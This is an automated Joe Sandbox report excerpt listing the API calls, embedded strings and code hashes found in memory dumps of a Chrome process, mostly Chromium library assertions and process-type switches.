                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$Acquire$Release__floor_pentium4
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at$T$T$)
                                                    • API String ID: 1376758062-1412603503
                                                    • Opcode ID: 155f2739da92dd79d9bc8392195bc98cae2a6ad170560646013128459c1b29be
                                                    • Instruction ID: 661fb8605f82bb1b25aa17c6b531ffaa9eecf4dc393145805d5cb86b720efe6f
                                                    • Opcode Fuzzy Hash: 155f2739da92dd79d9bc8392195bc98cae2a6ad170560646013128459c1b29be
                                                    • Instruction Fuzzy Hash: 24F17072A04609CFCB14DF69D4816BDB7F2FF89310B188629E847EB354D730A885CBA1
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00DF23D8,?,00D39152,?), ref: 00D391BB
                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00DF23D8,?,00D39152), ref: 00D391C5
                                                    • SetLastError.KERNEL32(?,?,?,000000FF,?,00000000), ref: 00D393FD
                                                    • OutputDebugStringA.KERNEL32(?,?,?,000000FF,?,00000000), ref: 00D394DB
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00D3969E
                                                    • ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00D394A2
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00D39694
                                                    • ..\..\third_party\libc++\src\include\string_view:330: assertion (__end - __begin) >= 0 failed: std::string_view::string_view(iterator, sentinel) received invalid range, xrefs: 00D394A9
                                                    • LOG_FATAL, xrefs: 00D396C7
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$DebugOutputString
                                                    • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$..\..\third_party\libc++\src\include\string_view:330: assertion (__end - __begin) >= 0 failed: std::string_view::string_view(iterator, sentinel) received invalid range$LOG_FATAL
                                                    • API String ID: 2831144795-1052261432
                                                    • Opcode ID: e87a74dc8d86b890f3c5bdf2d0c3adc7fc925d4a66a3f17cf6b080c78563ec09
                                                    • Instruction ID: 3cbbb6c165736c2e645faef796689fcc253dce2e96b17677d659700889c7149c
                                                    • Opcode Fuzzy Hash: e87a74dc8d86b890f3c5bdf2d0c3adc7fc925d4a66a3f17cf6b080c78563ec09
                                                    • Instruction Fuzzy Hash: 71E1D2B1E002159FDF10DFA4D8A1AAEF7B4EF44314F184169E815BB292D7B1AD06CBB1
                                                    Strings
                                                    • xr_compositing, xrefs: 00D4301A
                                                    • print_backend, xrefs: 00D43066
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00D42FC1
                                                    • nacl-loader, xrefs: 00D431E7
                                                    • icon_reader, xrefs: 00D4304F
                                                    • service-sandbox-type, xrefs: 00D42E5C
                                                    • gpu-process, xrefs: 00D42F8C
                                                    • disable-gpu-sandbox, xrefs: 00D42FA4
                                                    • type, xrefs: 00D42DFC
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00D42FBA
                                                    • screen_ai, xrefs: 00D43088
                                                    • no-sandbox, xrefs: 00D42DD8
                                                    • pdf_conversion, xrefs: 00D4302E
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$disable-gpu-sandbox$gpu-process$icon_reader$nacl-loader$no-sandbox$pdf_conversion$print_backend$screen_ai$service-sandbox-type$type$xr_compositing
                                                    • API String ID: 0-1105528107
                                                    • Opcode ID: fb9973fb6e41a83601741ec99505111b9efe0f8b99de81c203b84b2d857ac04f
                                                    • Instruction ID: 5a021dff56122c73c6a106696eec2464cdc05a54421210172afc66c651f6edac
                                                    • Opcode Fuzzy Hash: fb9973fb6e41a83601741ec99505111b9efe0f8b99de81c203b84b2d857ac04f
                                                    • Instruction Fuzzy Hash: F8A18A319053529BD7008B3AE852B36B7B0EF45300F944737FD9A772D1EB249A9DD2A0
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,00000000,?,00DB77EB,00000000,00000000), ref: 00DB2DDD
                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,00DB77EB,00000000,00000000), ref: 00DB3059
                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,00DB77EB,00000000,00000000), ref: 00DB30A9
                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,00DB77EB,00000000,00000000), ref: 00DB30D3
                                                    • __floor_pentium4.LIBCMT ref: 00DB310E
                                                    • __floor_pentium4.LIBCMT ref: 00DB3412
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00DB33A1
                                                    • T, xrefs: 00DB337B
                                                    • T, xrefs: 00DB334D
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease__floor_pentium4
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$T$T
                                                    • API String ID: 1764334464-272858712
                                                    • Opcode ID: 538a69099d9c66ba128c783937a1cca5c82332237c95f40d8103d2216fd5c7f1
                                                    • Instruction ID: 8872561dd43914e9e7c77f6e1e1665cecfcca202eac2b2570fb2d5820acbe45b
                                                    • Opcode Fuzzy Hash: 538a69099d9c66ba128c783937a1cca5c82332237c95f40d8103d2216fd5c7f1
                                                    • Instruction Fuzzy Hash: F422B171B00615CFCB18DF69C8812BEB7F2BF88310B198629E947EB314D731E9459BA0
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(00000000), ref: 00DBC98D
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00DBCA68
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DBCAB6
                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,00000021,?,00004000,?,000000FF), ref: 00DBCBF3
                                                    • TryAcquireSRWLockExclusive.KERNEL32(00000000), ref: 00DBCC2C
                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,00000010,?,00004000,FFFFFFFF,00000000), ref: 00DBCCDE
                                                      • Part of subcall function 00D3D400: TlsSetValue.KERNEL32(00000000,00000000,00000348,00000000,00000000,00000000,?,?,00D3D91D), ref: 00D3D485
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease$Value
                                                    • String ID: first$second
                                                    • API String ID: 3402380315-3095674784
                                                    • Opcode ID: 411384b878fc12a1d3e8c9ca752f0c72f5015ec1817dd94a6ad2967a164cb33d
                                                    • Instruction ID: 9982bfa098d68972d1b053cca7c31cfee36e3d3083cc9701c01e582ee7f722cd
                                                    • Opcode Fuzzy Hash: 411384b878fc12a1d3e8c9ca752f0c72f5015ec1817dd94a6ad2967a164cb33d
                                                    • Instruction Fuzzy Hash: FA32CF75614741DFD708CF29C880A6ABBE2FFC8314F18866DF59A9B291D730E845CBA1
                                                    APIs
                                                      • Part of subcall function 00D32130: GetCurrentThreadId.KERNEL32 ref: 00D32145
                                                      • Part of subcall function 00D32130: TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,00D31E30,?,?,00D31FBD,00D31E30,?,?,00D31E30), ref: 00D3214F
                                                    • GetCurrentThread.KERNEL32 ref: 00D32026
                                                    • IsDebuggerPresent.KERNEL32(00D31E30,?,?,00D31E30,?), ref: 00D3204E
                                                    • GetModuleHandleW.KERNEL32(Kernel32.dll,00D31E30,?,?,00D31E30,?), ref: 00D3208D
                                                    • GetProcAddress.KERNEL32(00000000,SetThreadDescription), ref: 00D32099
                                                    • GetCurrentThreadId.KERNEL32 ref: 00D32105
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00D320EC
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00D320E5
                                                    • Kernel32.dll, xrefs: 00D32088
                                                    • SetThreadDescription, xrefs: 00D32093
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: CurrentThread$AcquireAddressDebuggerExclusiveHandleLockModulePresentProc
                                                    • String ID: ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$Kernel32.dll$SetThreadDescription
                                                    • API String ID: 2807427228-2817593401
                                                    • Opcode ID: 6dcfaa94168b302442e328181bb7a0930e399905b3cd8f23a9a09987f7511630
                                                    • Instruction ID: 1835db30033a02f22ec968dd6252452803f8e11e1f89dc2ef62f290a4debb93a
                                                    • Opcode Fuzzy Hash: 6dcfaa94168b302442e328181bb7a0930e399905b3cd8f23a9a09987f7511630
                                                    • Instruction Fuzzy Hash: 0E411AB1E003159FDB149B25EC46A3E77A4EB44B50F094025F915BB392D732BC09CBB2
                                                    APIs
                                                    Strings
                                                    • %s: option `%s' is ambiguous (could be `--%s' or `--%s'), xrefs: 00D66943
                                                    • POSIXLY_CORRECT, xrefs: 00D66575
                                                    • -%c', xrefs: 00D669FE
                                                    • %s: argument required for option `, xrefs: 00D669DC
                                                    • %s: invalid option -- `-%c', xrefs: 00D66AAD
                                                    • --%s', xrefs: 00D66A1C
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: %s: argument required for option `$%s: invalid option -- `-%c'$%s: option `%s' is ambiguous (could be `--%s' or `--%s')$-%c'$--%s'$POSIXLY_CORRECT
                                                    • API String ID: 4218353326-3002513585
                                                    • Opcode ID: 0bd09395353c4d9424e72295c4af4a936e71453f9317f714bf71a5cb9b1b5582
                                                    • Instruction ID: c0041e63dee737cfa01ad5bd2006bb86a4369a526dcc432fa9d8d4e06c7055e5
                                                    • Opcode Fuzzy Hash: 0bd09395353c4d9424e72295c4af4a936e71453f9317f714bf71a5cb9b1b5582
                                                    • Instruction Fuzzy Hash: 9302D1B1E002198FDB14CF69D885BBAB7F5FB49308F18406AE846A7351DB34ED45CBA1
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00D7F8E6
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00D7F8DF
                                                    • T, xrefs: 00D7F8AA
                                                    • ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 00D7F8D8
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$T
                                                    • API String ID: 0-2907504972
                                                    • Opcode ID: bd9d0a969054460362db4b7121c980827aafd48d46439da17c3add66e0b65c82
                                                    • Instruction ID: 81b52431f133af4a31f10183e1834b31d18591a94c5df6fc2d616dcbe43a44ae
                                                    • Opcode Fuzzy Hash: bd9d0a969054460362db4b7121c980827aafd48d46439da17c3add66e0b65c82
                                                    • Instruction Fuzzy Hash: 16D1A6B0A007019FD724DF29D885626B7E1FF45304F18857DE88A9B362F771E855CBA2
                                                    APIs
                                                    • FormatMessageW.KERNEL32(00001300,00000000,00E71859,00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00E715FB
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00E71859,?,?), ref: 00E71605
                                                      • Part of subcall function 00DE0030: GetLastError.KERNEL32 ref: 00DE00AC
                                                      • Part of subcall function 00DE0030: SetLastError.KERNEL32(00000000), ref: 00DE00BA
                                                      • Part of subcall function 00DE0030: SetLastError.KERNEL32(?), ref: 00DE017B
                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00E71662
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00E71775
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00E7177C
                                                    • (0x%lX), xrefs: 00E71673
                                                    • ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 00E7176E
                                                    • Error (0x%lX) while retrieving error. (0x%lX), xrefs: 00E7160D
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$FormatFreeLocalMessage
                                                    • String ID: (0x%lX)$..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$Error (0x%lX) while retrieving error. (0x%lX)
                                                    • API String ID: 2740663437-2412322823
                                                    • Opcode ID: 1d71bccc63a48a4901a9c6cca97a7952ed5e8b3f73aeae97ec5cd2c8cbf2049f
                                                    • Instruction ID: f18e7f05d0e2d63838327da89669aa769e222e1cbe868a8cefc33c09f10438ea
                                                    • Opcode Fuzzy Hash: 1d71bccc63a48a4901a9c6cca97a7952ed5e8b3f73aeae97ec5cd2c8cbf2049f
                                                    • Instruction Fuzzy Hash: FF41F6B1E003596FDB01EFA4DC85ABF7BB8EF49704F049069F809BA211E630AA45C761
                                                    APIs
                                                    • GetCurrentThread.KERNEL32 ref: 00D3D046
                                                    • GetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00D3D049
                                                    • GetCurrentThread.KERNEL32 ref: 00D3D053
                                                    • SetThreadPriority.KERNEL32(00000000,00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D3D058
                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00D3D0B6
                                                    • GetCurrentThread.KERNEL32 ref: 00D3D0C1
                                                    • SetThreadPriority.KERNEL32(00000000,?), ref: 00D3D0CC
                                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 00D3D0DA
                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00D3D1D4
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: Thread$CurrentPerformancePriorityQuery$Counter$Frequency
                                                    • String ID:
                                                    • API String ID: 2845919953-0
                                                    • Opcode ID: 94d12c969f96c96cde04dac8b15f5137a72389a38728222ea9ed38d9927cba8f
                                                    • Instruction ID: b614f1d4427a5f6cf0359224e12e8ffedd9816c8a59c4ee9c2d8914e2ebe16c2
                                                    • Opcode Fuzzy Hash: 94d12c969f96c96cde04dac8b15f5137a72389a38728222ea9ed38d9927cba8f
                                                    • Instruction Fuzzy Hash: B1517A719047448FC311DF35E84552ABBF5FF99790F108A2EF48573261EB32A949CB42
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(00000040), ref: 00D3D6D0
                                                    • ReleaseSRWLockExclusive.KERNEL32(00000002), ref: 00D3D73F
                                                      • Part of subcall function 00DA8000: TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DA8047
                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,AF000000,?,00E8D674), ref: 00D3D769
                                                    • TryAcquireSRWLockExclusive.KERNEL32(00000040), ref: 00D3D9A2
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D3DA63
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease
                                                    • String ID: first$second
                                                    • API String ID: 17069307-3095674784
                                                    • Opcode ID: c5128c5fd703e083dcade79de3cfc3b847700928499e125fe579bf6831cf659d
                                                    • Instruction ID: 3da9c0cf3ed33512305c73d66de874b06677256b6ac9c6d50ac5b24c2a229572
                                                    • Opcode Fuzzy Hash: c5128c5fd703e083dcade79de3cfc3b847700928499e125fe579bf6831cf659d
                                                    • Instruction Fuzzy Hash: 91F1CE756047019FC718CF28D880A2AB7E2FFC8324F19892DF5999B2A2D730E945CF61
                                                    APIs
                                                    • __floor_pentium4.LIBCMT ref: 00E508C1
                                                    • GetStringTypeW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 00E51CA3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: StringType__floor_pentium4
                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                    • API String ID: 2638037228-2761157908
                                                    • Opcode ID: c20e368be399c65e943edadf4ca5e57acfb7d8a033e484df4ac146770000e84d
                                                    • Instruction ID: 88f4c3bba6d3a4c1430b888fdacf49ecdc47a23f6ab42d0d1bb5e1c99a60cc3c
                                                    • Opcode Fuzzy Hash: c20e368be399c65e943edadf4ca5e57acfb7d8a033e484df4ac146770000e84d
                                                    • Instruction Fuzzy Hash: 27D24A71E082298FDB65CE28DD407EAB7B5EB44306F1455EAE80DF7240E774AE898F41
                                                    APIs
                                                    • InitOnceExecuteOnce.KERNEL32(00F00488,00D9A780,00000000,00000000), ref: 00D4B6DB
                                                      • Part of subcall function 00E09410: InitOnceExecuteOnce.KERNEL32(00F00488,00D9A780,00000000,00000000,?,00D4B992,?,?,?), ref: 00E0942D
                                                    Strings
                                                    • ..\..\base\observer_list.h, xrefs: 00D4AC18
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00D4AC5B
                                                    • AddObserver, xrefs: 00D4AC1D
                                                    • Observers can only be added once!, xrefs: 00D4AC41
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: Once$ExecuteInit
                                                    • String ID: ..\..\base\observer_list.h$..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$AddObserver$Observers can only be added once!
                                                    • API String ID: 689400697-421725328
                                                    • Opcode ID: f10a7029ed9f9c4b016ee75fda8adadd880657251abf98f0ee2fc8326842f761
                                                    • Instruction ID: 952f04e4b8100767ef375752434fd6afb20cb4a27decdc4581fb628275ba3a3a
                                                    • Opcode Fuzzy Hash: f10a7029ed9f9c4b016ee75fda8adadd880657251abf98f0ee2fc8326842f761
                                                    • Instruction Fuzzy Hash: E3B25D75600706CFCB24CF28D480A6AB7F1FF94314F198A5AD89A5B752D370F946CBA2
                                                    APIs
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00DF84B0
                                                    • PERFETTO_CHECK(false), xrefs: 00DF8495
                                                    • ..\..\third_party\perfetto\include\perfetto\tracing\track_event_interned_data_index.h, xrefs: 00DF8486
                                                    • %s (errno: %d, %s), xrefs: 00DF849A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
